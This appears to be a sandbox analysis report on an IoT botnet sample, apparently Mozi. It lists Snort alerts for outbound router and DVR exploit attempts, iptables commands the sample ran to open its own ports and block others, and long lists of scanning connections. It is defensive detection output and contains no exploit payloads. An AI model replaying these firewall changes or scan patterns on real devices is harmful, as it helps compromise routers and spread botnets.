                Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:52998 -> 116.206.55.142:52869
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:35196 -> 104.115.250.114:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:35196 -> 104.115.250.114:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.250.114:80 -> 192.168.2.20:35196
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 129.16.2.234: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.152.114.5: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 168.95.157.5: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.59.216.67: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.95.78.148: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:47542 -> 45.196.102.179:80
                Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:47542 -> 45.196.102.179:80
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.150.96.14: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.165.182.127: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:37970 -> 175.252.8.184:8080
                Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:37970 -> 175.252.8.184:8080
                Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 211.227.96.15:57445 -> 192.168.2.20:14165
                Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 134.97.128.247: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.37.130.69: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:42922 -> 23.96.36.243:80
                Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:42922 -> 23.96.36.243:80
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.218.155.42: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.155.180.12: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 4.16.0.234: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.203.0.195: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44286 -> 34.117.168.156:80
                Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:51602 -> 104.98.58.115:80
                Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:51602 -> 104.98.58.115:80
                Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.98.58.115:80 -> 192.168.2.20:51602
                Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:47394 -> 15.206.172.134:80
                Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:47394 -> 15.206.172.134:80
                Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 107.164.203.92: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.218.46.16:80 -> 192.168.2.20:60196
                Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60196 -> 23.218.46.16:80
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.192.4.224: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:60130 -> 99.61.64.177:8080
                Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:60130 -> 99.61.64.177:8080
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.210.243.211: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 217.196.225.4: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.215.105.193: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.92.141.24: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 187.18.116.82: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 216.221.97.226: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 203.116.7.190: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:44974 -> 192.155.170.244:80
                Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:44974 -> 192.155.170.244:80
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.148.141.21: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:57262 -> 51.178.69.101:80
                Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:53646 -> 184.31.173.81:80
                Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:53236 -> 66.201.89.13:80
                Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:53236 -> 66.201.89.13:80
                Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:53646 -> 184.31.173.81:80
                Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.31.173.81:80 -> 192.168.2.20:53646
                Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.227.19.236: -> 192.168.2.20:
                Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.218.148.138:80 -> 192.168.2.20:46816
                Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:46816 -> 23.218.148.138:80
                Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59382 -> 45.195.180.141:80
                Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59382 -> 45.195.180.141:80
                Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:55652 -> 38.87.83.34:80
                Connects to many ports of the same IP (likely port scanning)
                Executes the "iptables" command to insert, remove and/or manipulate rules
                Source: /bin/sh (PID: 4618), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Uses known network protocols on non-standard ports
                Source: unknown, Network traffic detected: HTTP traffic on port 34926 -> 49152
                Source: unknown, Network traffic detected: HTTP traffic on port 49152 -> 34926
                Source: unknown, Network traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknown, Network traffic detected: HTTP traffic on port 40718 -> 8443
                Source: global trafficTCP traffic: 192.168.2.20:59688 -> 16.65.75.160:52869
                Source: global trafficTCP traffic: 192.168.2.20:49042 -> 195.28.214.1:5555
                Source: global trafficTCP traffic: 192.168.2.20:47200 -> 81.85.194.30:8080
                Source: global trafficTCP traffic: 192.168.2.20:56756 -> 86.150.240.234:37215
                Source: global trafficTCP traffic: 192.168.2.20:35898 -> 95.101.120.128:8080
                Source: global trafficTCP traffic: 192.168.2.20:48694 -> 83.81.254.230:7574
                Source: global trafficTCP traffic: 192.168.2.20:45612 -> 60.86.119.144:81
                Source: global trafficTCP traffic: 192.168.2.20:35764 -> 186.119.243.90:49152
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 27.33.40.40:8443
                Source: global trafficTCP traffic: 192.168.2.20:35544 -> 126.61.58.229:37215
                Source: global trafficTCP traffic: 192.168.2.20:33802 -> 200.240.85.208:52869
                Source: global trafficTCP traffic: 192.168.2.20:57480 -> 175.192.25.171:8080
                Source: global trafficTCP traffic: 192.168.2.20:42410 -> 197.44.113.237:8443
                Source: global trafficTCP traffic: 192.168.2.20:43818 -> 191.184.16.254:8080
                Source: global trafficTCP traffic: 192.168.2.20:60776 -> 68.82.30.86:8443
                Source: global trafficTCP traffic: 192.168.2.20:41850 -> 17.74.78.16:8080
                Source: global trafficTCP traffic: 192.168.2.20:57370 -> 19.227.52.166:8443
                Source: global trafficTCP traffic: 192.168.2.20:52122 -> 202.34.135.27:7574
                Source: global trafficTCP traffic: 192.168.2.20:43226 -> 198.50.156.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:53640 -> 123.237.248.195:52869
                Source: global trafficTCP traffic: 192.168.2.20:45910 -> 95.98.64.180:8080
                Source: global trafficTCP traffic: 192.168.2.20:58966 -> 49.245.175.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:51354 -> 29.202.233.5:37215
                Source: global trafficTCP traffic: 192.168.2.20:60896 -> 92.186.8.163:8080
                Source: global trafficTCP traffic: 192.168.2.20:41414 -> 135.228.46.217:8080
                Source: global trafficTCP traffic: 192.168.2.20:40950 -> 174.252.187.249:37215
                Source: global trafficTCP traffic: 192.168.2.20:41290 -> 89.4.36.102:37215
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 149.42.172.25:7574
                Source: global trafficTCP traffic: 192.168.2.20:35888 -> 137.197.44.71:8443
                Source: global trafficTCP traffic: 192.168.2.20:56664 -> 197.181.82.192:52869
                Source: global trafficTCP traffic: 192.168.2.20:57416 -> 174.135.4.19:8080
                Source: global trafficTCP traffic: 192.168.2.20:51356 -> 199.164.2.226:5555
                Source: global trafficTCP traffic: 192.168.2.20:58378 -> 39.8.92.226:8080
                Source: global trafficTCP traffic: 192.168.2.20:35422 -> 222.8.146.13:8443
                Source: global trafficTCP traffic: 192.168.2.20:36822 -> 141.145.10.198:49152
                Source: global trafficTCP traffic: 192.168.2.20:33320 -> 108.77.7.163:49152
                Source: global trafficTCP traffic: 192.168.2.20:33196 -> 16.146.174.98:5555
                Source: global trafficTCP traffic: 192.168.2.20:43882 -> 38.150.249.112:8443
                Source: global trafficTCP traffic: 192.168.2.20:42304 -> 93.175.160.79:52869
                Source: global trafficTCP traffic: 192.168.2.20:42934 -> 179.196.98.226:7574
                Source: global trafficTCP traffic: 192.168.2.20:48398 -> 105.158.147.174:81
                Source: global trafficTCP traffic: 192.168.2.20:39078 -> 149.189.159.233:37215
                Source: global trafficTCP traffic: 192.168.2.20:51686 -> 62.107.94.94:8080
                Source: global trafficTCP traffic: 192.168.2.20:57748 -> 74.208.118.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:56716 -> 182.104.216.147:52869
                Source: global trafficTCP traffic: 192.168.2.20:34106 -> 187.16.231.32:37215
                Source: global trafficTCP traffic: 192.168.2.20:34826 -> 182.157.115.73:49152
                Source: global trafficTCP traffic: 192.168.2.20:50148 -> 186.67.89.101:8080
                Source: global trafficTCP traffic: 192.168.2.20:53370 -> 129.126.74.71:81
                Source: global trafficTCP traffic: 192.168.2.20:46502 -> 36.138.107.187:49152
                Source: global trafficTCP traffic: 192.168.2.20:38782 -> 159.223.77.33:7574
                Source: global trafficTCP traffic: 192.168.2.20:59708 -> 96.210.216.56:8443
                Source: global trafficTCP traffic: 192.168.2.20:54996 -> 101.164.76.184:52869
                Source: global trafficTCP traffic: 192.168.2.20:48852 -> 80.245.214.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:47984 -> 184.106.84.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 111.94.109.213:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 27.245.148.122:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 216.168.246.82:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 4.29.56.116:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 38.107.4.6:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 216.104.95.57:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 47.225.32.191:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 115.172.34.22:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 165.24.244.15:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 110.54.63.53:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 91.89.192.214:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 123.150.242.243:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 156.56.38.42:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 174.28.155.92:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 188.214.50.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 122.55.125.10:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 198.150.168.4:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 14.109.51.21:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 100.177.221.80:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 139.152.15.126:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 47.161.81.172:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 13.63.61.154:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 206.220.228.131:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 93.29.142.216:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 176.45.32.163:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 124.37.144.160:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 63.138.123.177:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 154.144.107.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 85.93.120.215:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 83.206.191.47:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 59.141.175.49:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 170.104.98.24:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 61.90.94.67:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 194.225.68.79:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 24.105.116.75:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 89.162.4.190:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 71.116.155.86:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 174.213.151.13:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 121.175.138.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 195.28.143.84:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 217.111.127.234:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 32.237.238.150:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 54.121.138.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 186.206.2.61:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 125.45.118.206:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 147.237.210.54:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 217.98.141.9:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 2.69.114.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 8.78.234.102:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 76.102.146.7:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 31.225.215.251:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 46.166.183.35:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 71.226.140.212:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 179.1.27.195:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 178.103.96.49:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 209.50.36.159:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 70.77.125.153:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 203.140.50.39:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 36.107.62.85:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 167.143.118.183:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 81.90.71.55:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 114.149.31.119:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 45.18.116.249:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 40.170.168.4:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 70.44.30.7:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 73.168.135.102:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 62.29.193.16:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 105.88.240.95:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 63.188.38.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 219.92.27.198:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 120.99.119.111:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 40.201.181.241:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 31.196.60.220:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 220.1.153.205:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 133.67.141.167:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 110.164.249.236:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 135.132.147.203:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 39.82.50.240:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 113.104.218.82:1023
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 171.160.36.48:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 19.191.96.74:2323
                Source: global trafficTCP traffic: 192.168.2.20:52661 -> 206.237.149.185:2323
                Source: global trafficTCP traffic: 192.168.2.20:51666 -> 48.38.228.119:37215
                Source: global trafficTCP traffic: 192.168.2.20:55084 -> 171.80.64.115:7574
                Source: global trafficTCP traffic: 192.168.2.20:37922 -> 47.112.175.159:8443
                Source: global trafficTCP traffic: 192.168.2.20:39908 -> 44.103.97.78:8080
                Source: global trafficTCP traffic: 192.168.2.20:55610 -> 180.157.38.69:7574
                Source: global trafficTCP traffic: 192.168.2.20:50832 -> 67.224.83.245:8080
                Source: global trafficTCP traffic: 192.168.2.20:56492 -> 23.11.95.110:37215
                Source: global trafficTCP traffic: 192.168.2.20:50150 -> 42.186.87.158:52869
                Source: global trafficTCP traffic: 192.168.2.20:53732 -> 123.41.22.146:5555
                Source: global trafficTCP traffic: 192.168.2.20:43170 -> 206.113.172.55:5555
                Source: global trafficTCP traffic: 192.168.2.20:56982 -> 11.161.130.93:7574
                Source: global trafficTCP traffic: 192.168.2.20:55592 -> 197.241.111.186:7574
                Source: global trafficTCP traffic: 192.168.2.20:43670 -> 17.171.21.221:81
                Source: global trafficTCP traffic: 192.168.2.20:56286 -> 49.162.158.92:7574
                Source: global trafficTCP traffic: 192.168.2.20:44560 -> 58.83.78.135:7574
                Source: global trafficTCP traffic: 192.168.2.20:56802 -> 211.10.41.156:37215
                Source: global trafficTCP traffic: 192.168.2.20:60784 -> 163.5.97.251:81
                Source: global trafficTCP traffic: 192.168.2.20:56348 -> 202.51.68.65:52869
                Source: global trafficTCP traffic: 192.168.2.20:43936 -> 132.125.134.18:8080
                Source: global trafficTCP traffic: 192.168.2.20:33974 -> 125.233.81.181:5555
                Source: global trafficTCP traffic: 192.168.2.20:49644 -> 219.72.130.131:52869
                Source: global trafficTCP traffic: 192.168.2.20:45920 -> 72.48.87.170:81
                Source: global trafficTCP traffic: 192.168.2.20:54482 -> 156.203.51.71:52869
                Source: global trafficTCP traffic: 192.168.2.20:38870 -> 222.89.163.71:52869
                Source: global trafficTCP traffic: 192.168.2.20:54236 -> 67.154.29.99:8080
                Source: global trafficTCP traffic: 192.168.2.20:45226 -> 28.24.68.105:5555
                Source: global trafficTCP traffic: 192.168.2.20:54834 -> 146.106.79.93:49152
                Source: global trafficTCP traffic: 192.168.2.20:34598 -> 129.65.108.24:5555
                Source: global trafficTCP traffic: 192.168.2.20:34120 -> 49.183.251.35:8443
                Source: global trafficTCP traffic: 192.168.2.20:56828 -> 14.131.47.227:52869
                Source: global trafficTCP traffic: 192.168.2.20:56514 -> 154.247.85.42:8080
                Source: global trafficTCP traffic: 192.168.2.20:33082 -> 190.231.42.136:37215
                Source: global trafficTCP traffic: 192.168.2.20:47700 -> 115.18.168.79:8080
                Source: global trafficTCP traffic: 192.168.2.20:38916 -> 71.251.113.238:5555
                Source: global trafficTCP traffic: 192.168.2.20:58026 -> 193.226.141.130:81
                Source: global trafficTCP traffic: 192.168.2.20:50436 -> 152.26.85.31:8443
                Source: global trafficTCP traffic: 192.168.2.20:57174 -> 159.193.139.173:81
                Source: global trafficTCP traffic: 192.168.2.20:57306 -> 40.43.172.11:37215
                Source: global trafficTCP traffic: 192.168.2.20:40524 -> 203.155.149.72:81
                Source: global trafficTCP traffic: 192.168.2.20:40494 -> 5.147.60.12:37215
                Source: global trafficTCP traffic: 192.168.2.20:55674 -> 140.23.32.247:8443
                Source: global trafficTCP traffic: 192.168.2.20:38606 -> 117.167.92.191:52869
                Source: global trafficTCP traffic: 192.168.2.20:35006 -> 124.55.234.220:81
                Source: global trafficTCP traffic: 192.168.2.20:59668 -> 74.232.137.164:5555
                Source: global trafficTCP traffic: 192.168.2.20:50708 -> 207.102.60.4:8080
                Source: global trafficTCP traffic: 192.168.2.20:51106 -> 46.222.134.3:8080
                Source: global trafficTCP traffic: 192.168.2.20:43478 -> 51.123.219.80:8443
                Source: global trafficTCP traffic: 192.168.2.20:35768 -> 1.210.9.44:5555
                Source: global trafficTCP traffic: 192.168.2.20:52016 -> 154.57.218.161:49152
                Source: global trafficTCP traffic: 192.168.2.20:42950 -> 37.111.156.94:8080
                Source: global trafficTCP traffic: 192.168.2.20:45136 -> 122.228.67.222:49152
                Source: global trafficTCP traffic: 192.168.2.20:60528 -> 122.243.131.89:7574
                Source: global trafficTCP traffic: 192.168.2.20:48566 -> 210.116.241.219:5555
                Source: global trafficTCP traffic: 192.168.2.20:43386 -> 11.226.128.181:8080
                Source: global trafficTCP traffic: 192.168.2.20:60056 -> 217.125.147.200:5555
                Source: global trafficTCP traffic: 192.168.2.20:40164 -> 220.131.225.243:8080
                Source: global trafficTCP traffic: 192.168.2.20:46268 -> 55.187.88.64:8080
                Source: global trafficTCP traffic: 192.168.2.20:40716 -> 163.36.51.21:5555
                Source: global trafficTCP traffic: 192.168.2.20:54422 -> 64.42.1.11:81
                Source: global trafficTCP traffic: 192.168.2.20:54210 -> 206.117.114.232:8443
                Source: global trafficTCP traffic: 192.168.2.20:44944 -> 222.133.41.233:5555
                Source: global trafficTCP traffic: 192.168.2.20:34578 -> 99.155.210.76:8443
